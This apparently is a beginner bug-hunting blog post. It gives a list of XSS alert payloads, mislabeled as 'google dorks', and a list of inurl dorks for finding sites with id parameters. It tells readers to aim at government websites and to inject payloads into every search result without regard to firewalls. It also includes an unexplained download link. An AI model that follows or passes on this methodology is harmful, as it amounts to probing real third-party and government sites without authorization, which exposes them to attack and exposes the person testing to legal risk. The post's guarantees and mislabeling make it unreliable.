As a beginner, you try to find bugs in many websites but still you got nothing. You got Demotivation during bug hunting ,Don’t worry when i am here why are you fear.
for download : https://getafilenow.com/1646611
When I began bug hunting, I did like you . I didn’t find any bugs and got demotivation. But, still I didn’t leave the hope. I stood there and did practice again and again, finally got the first bug (xss) and report it.
I will give you all the methodology for bug hunting.
Note : It is special methodology for newbies.
Follow these steps and find your first bug. I guarantee you will find your first bug.
Step1: find govt. websites for bug huting because mostly govt. websites are vulnerable so it is helpful for you.
Step2: use google dorks to find vulnerable parameters.
some google dorks here:
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>Step3 : Lets explain with live example (find xss )
Step4: use this google dorks to find vulnerable parameter for XSS
These are the dorks for finding vulnerable parametes :
inurl:index.php?id=
inurl:product.php?id=
inurl:category.php?id=
inurl:article.php?id=
inurl:gallery.php?id=
inurl:page.php?id=
inurl:show.php?id=
inurl:detail.php?id=
inurl:view.php?id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:topic.php?ID=
inurl:forum.php?topic=
inurl:viewforum.php?id=
inurl:profile.php?id=
inurl:showthread.php?t=
inurl:member.php?action=profile&id=
inurl:productlist.php?id=
inurl:shop_category.php?id=
inurl:catalog.php?cat=
I will choose first for finding XSS
inurl:index.php?id=Step5: Simple copy and dork and paste on the browser and search it .
Step6: open every link one by one and put the payload , check for XSS (don’t worry about firewall or bypass technique, simply go put xss payload and try to get pop up) Paylod: “><script>alert(‘XSS’)</script>
In the above screenshot I didn’t find any XSS vuln., so i try next one again and again till it shows popup.
Step7: After visiting lot of website I got a First Bug
Step8: BOOM Guys You got your first bug now you can report it on open bug bounty
for PRACTICLE Video visit here
This channel is help you to find your first bug.
Thanks for reading till End we will meet in next article and report this vulnerability on OPEN BUG BOUNTY
